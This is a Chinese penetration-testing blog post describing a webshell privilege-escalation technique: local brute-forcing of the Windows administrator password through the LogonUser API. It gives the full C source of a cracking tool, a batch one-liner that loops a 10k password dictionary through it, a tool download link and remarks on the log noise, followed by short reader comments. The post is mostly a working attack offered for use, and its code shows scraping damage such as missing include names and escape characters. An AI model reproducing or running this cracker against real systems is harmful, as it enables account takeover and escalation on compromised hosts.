• 投稿邮箱:admin@xssec.org 查看详情
  • 本站教程默认解压密码:666
  • 官方新浪微博:Porry呦
  •    3个月前 (11-21)  渗透教程 |   5 条评论

    Webshell下的另类提权之3389密码爆破

    在tools看到x0wolf发布的一个提权新思路觉得不错就收藏过来了。

    利用 LogonUser API 模拟用户登陆  判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i

    1w 字典几秒基本可以,缺点就是会产生大量系统登陆日志。

    脚本:

    #include
    #include  
    void help()
    {         
    printf("by x0wolf && lostwolf n");
    printf("runas user passn"); 
    }  
    int LoginCreateProcess(char* user,char* pass) 
    {         
    HANDLE hToken;         
    STARTUPINFOA   si;           
    PROCESS_INFORMATION pi;             
    ZeroMemory(&si, sizeof(si));         
    ZeroMemory(&pi, sizeof(pi));         
    si.cb = sizeof(si);           
    if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken))         
    {                 
    printf("Failed to call LogonUser FailedNum:%dn",GetLastError());                 
    return 0;        
     }         
    else         
    {                 
    printf("Login Sucessedn");                 
    return 1;         
    } }   int main(int argc,char* argv[]) {         
    if(argc!=3)         
    {                 
    help();                 
    exit(0);        
     }         
    if(argc==3)         
    {                 
    LoginCreateProcess(argv[1],argv[2]);         
    } 
    }
    
    

    工具下载:runas

     

    除特别注明外,本站所有文章均为新世纪安全社区原创,转载请注明出处来自http://www.xssec.org/1367.html

    八块腹肌挂腰间,续写另类拳皇篇。

    发表评论

    1. 非常感谢分享, 学习了 :lol:

      神州 2个月前 (12-11) [0] [0]
    2. 分享

      hycgjt1234 2个月前 (12-10) [0] [0]
    3. 官方新浪微博

      hycgjt1234 2个月前 (12-10) [0] [0]
    4. 好好

      hycgjt1234 2个月前 (12-10) [0] [0]
    5. 感谢分享

      一笑了之. 3个月前 (11-21) [0] [0]
    
    切换注册

    登录

    忘记密码 ?

    您也可以使用第三方帐号快捷登录

    切换登录

    注册

    扫一扫二维码分享